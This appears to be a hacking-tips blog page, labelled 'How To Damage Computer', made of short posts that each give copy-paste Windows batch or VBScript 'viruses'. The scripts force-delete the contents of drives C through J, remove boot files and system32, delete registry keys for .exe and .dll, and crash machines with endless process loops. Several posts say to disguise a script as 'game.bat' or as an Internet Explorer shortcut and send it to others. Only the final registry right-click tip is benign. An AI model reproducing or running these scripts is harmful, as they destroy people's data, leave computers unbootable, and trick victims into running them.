Showing posts with label How To Damage Computer. Show all posts
Showing posts with label How To Damage Computer. Show all posts

How To Delete All Data Of C Drive

By // No comments:
How To Delete All Data Of C Drive 

Step 1 >> Open Notepad.
Step 2 >> Copy Code .
*********************************************************
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
********************************************************
Step 3 >> Save The Above Code As Anything.bat


How To Make A Virus that Crashes Computer Or Laptop

By // 1 comment:
How To Make A Virus that Crashes Computer Or Laptop

Step 1 >> Open Notepad.
Step 2 >> Copy This Code .
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Step 3 >> Save As Anything.bat File In Notepad!!


This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

How To Crash Computer With Only One Click

By // 1 comment:
How To Crash Computer With Only One Click

Step 1 >> Open Notepad.


Step 2 >> Copy This Code.
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Step 3 >> Save It As Anything.vbs


Step 4>> Run It.

How To Automaticaly Hit Enter Again And Again

By // No comments:

How To Automaticaly Hit Enter Again And Again
Step 1 >> Open Notepad.

Step 2 >> Copy This Code. Code:
---------------------------------------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
---------------------------------------------------------------------------------------
Step 3 >>Save it as "Anything.VBS" and send it. Or Run It. 


How To Caps lock Automaticly On/OFF Again And Again

By // 1 comment:
How To Caps lock Automaticly On/OFF Again And Again

Step 1 >> Open Notepad.

Step 2 >>Copy Code.
Code:
*************************************************************************

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

**************************************************************************
Step 3 >> Save it as "Anything.VBS" and send it.

How To Delete C,D,E Drive

By // No comments:
Step 1 >> Open Notepad.
Step 2>> Copy the below command there
****************************************************************************

rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

*******************************************************************************
Step 3 >>Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

How To Damage A Laptop using Notepad

By // No comments:
How To Damage A Laptop using Notepad

Step 1 >>Open Notepad

Step 2 >>  Write / copy the below command there:
*******************************************
 del c:\WINDOWS\system32\*.*/q 
********************************************

Step 3 >> save as " anything.bat"Done.

Step 4 >> Run It. 

ShutDown PC million Times

By // No comments:
ShutDown PC million Times::::

Step 1 >> Right click on the desktop
Step 2>> Click shortcut


you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next


note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...

Step 3>>You will get another dialogue box, write in it: Internet Explorer and press finish


Step 4>>You will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe


Note: the only One way To stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

How to Crash a PC Forever

By // No comments:

Learn How To Make A Dangerous Virus Using Notepad....



How to crash a PC Forever !::: 

Step 1 >> Open Notepad .

Step 2 >> Copy Code .

***************************************************
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


***********************************************

Step 3 >>Save it as a game.bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.

How To Make A Virus

By // No comments:
Also Read:-

Learn How To Make A Dangerous Virus Using Notepad....

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::
*********************************************************
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


***************************************************************

Then save it as game.bat and the batch file is created .


WARNING :: This is the most dangerous virus! Be careful with its use.


Delete the entire registry


@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as play.bat and the batch file is created .

How to Add Your Name To Right Click Of My Computer

By // No comments:
How to Add Your Name To Right Click Of My Computer


Caution .. As it is related to Windows regisrty it can be dangerous so,Try This at ur own risk

To write your name on right click application please follow the steps.

Step 1 >>Open Notead .

Step 2 >> Copy Code. 
****************************************************************************** 
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor] @="Your Name Or Name of the Application" [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command] @="Location Of The Application"

*********************************************************************************
Step 3.Change Your Name  
Eg:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor] @="Besthacker" 

Step 4 >>Enter the location Of the application Which u want to open In:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command] @="Location Of The Application"
For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Step 5 >> Svae It As Besthacker.reg


Step 6 >> Run It.

Other Options

------------------------------------------------------------
 
To add Application Control Panel 
*****************************************************************************
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command] @="rundll32.exe shell32.dll,Control_RunDLL"
*****************************************************************************
To add Application Add/Remove 
*************************************************** [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove\command] @="control appwiz.cpl"
*****************************************************************************
To add Application Reboot 
*************************************************** [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command] @="shutdown -r -f -t 5"
*****************************************************************************
To add Application Shutdown 
*************************************************** [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command] @="shutdown -s -f -t 5"
*****************************************************************************